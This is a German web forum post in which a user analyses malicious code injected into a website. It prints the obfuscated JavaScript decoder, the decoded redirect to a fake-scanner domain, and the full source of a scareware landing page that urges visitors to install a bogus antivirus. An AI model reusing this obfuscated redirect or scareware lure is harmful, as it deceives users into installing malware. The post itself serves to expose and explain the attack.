pother_dane: VIRUS oder Sonst was im HTML CODE

Beitrag lesen

SELF-Forum

VIRUS oder Sonst was im HTML CODE

pother_dane
Informationen zu den Bewertungsregeln

Weil ich gerade noch Zeit hatte:

Vom Server kommt kein Banner, sondern ein Code-Schnippsel der nach dem gleichen Muster "verschleiert"/"kodiert" ist:

  
function U(sx,Z){  
 if(!Z){Z='tV(&ue%Y[7A=-iP<R?zH#b|.$/W5{Sp!JGa_;F3+*jD`EXxMCI9ym,)lgr:dZcBf';}var g;var XF='';for(var Y=0;Y<sx.length;Y+=4){g=(Z.indexOf(sx.charAt(Y))&255)<<18|(Z.indexOf(sx.charAt(Y+1))&255)<<12|(Z.indexOf(sx.charAt(Y+2))&255)<<(6)|Z.indexOf(sx.charAt(Y+3))&255;XF+=String.fromCharCode((g&16711680)>>16,(g&65280)>>8,g&255);}alert(XF);}U('/%c_S|,F5+RxSl7jS%#*7yIy$9{`7l7j{YRB[%?M$lbX/|rm=3IM$)emW|cx<z7*SY?CPaZM/)ZX{)iG5a,C{3Zx$)cX=yc,W|Rc-H$r[atZ=li_79E+{3FCS&g+AHEJ');  
  
//die "entschleiert" folgendes hervorbringt  
document.write('<sc'+'ript> document.location="http://go-scan-pro.com/?uid=169" </sc'+'ript>');

Eine ganz schön komplizierte Art einer Umleitung. Schließlich landet man auf einer Seite, ab der es mir dann (mit meinem eingeschränkten Sachverstand) zu heiß wird weiter zu "forschen".

Für interessierte der Quelltext:

  
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"  
"http://www.w3.org/TR/html4/loose.dtd">  
<html>  
<head>  
  <title>Internet Security is important </title>  
  <script type="text/javascript">  
  var confmsg='Attention! Your PC may not have privacy protection system. This may lead to irretrievable results.\n\nNow your system will be scanned for privacy security risks.\n\nPress OK to continue.';  
var alrtmsg='Internet Antivirus will scan your system now.\n\nPlease select "RUN" or "OPEN" when prompted to start the installation.\n\nThis file has been digitally signed and independently certified as 100% free of viruses, adware and spyware.';  
  
  </script>  
  <script language="javascript" src="script_de.js"></script> <script type="text/javascript">  
function start_actions()  
{  
 window.location='/22/?uid=keyin&in=0&xx=0&end=0&g=1&';}  
</script>  
 </head>  
<body onload="start_actions()">  
  
<script>  
document.write('<OBJECT id="iie" width="0" height="0" style="position:absolute; left:0;top:0;" CLASSID="CLSID:6BF52A52-394A-11d3-B153-00C04F79FAA6" type="application/x-oleobject">  <PARAM NAME="SendPlayStateChangeEvents" VALUE="True"> <PARAM NAME="AutoStart" VALUE="True"> <PARAM name="uiMode" value="none"> <PARAM name="PlayCount" value="9999"></OBJECT>');  
</script>  
</body>  
</html>

gruß,

pD

Beitrag melden
Informationen zu den Bewertungsregeln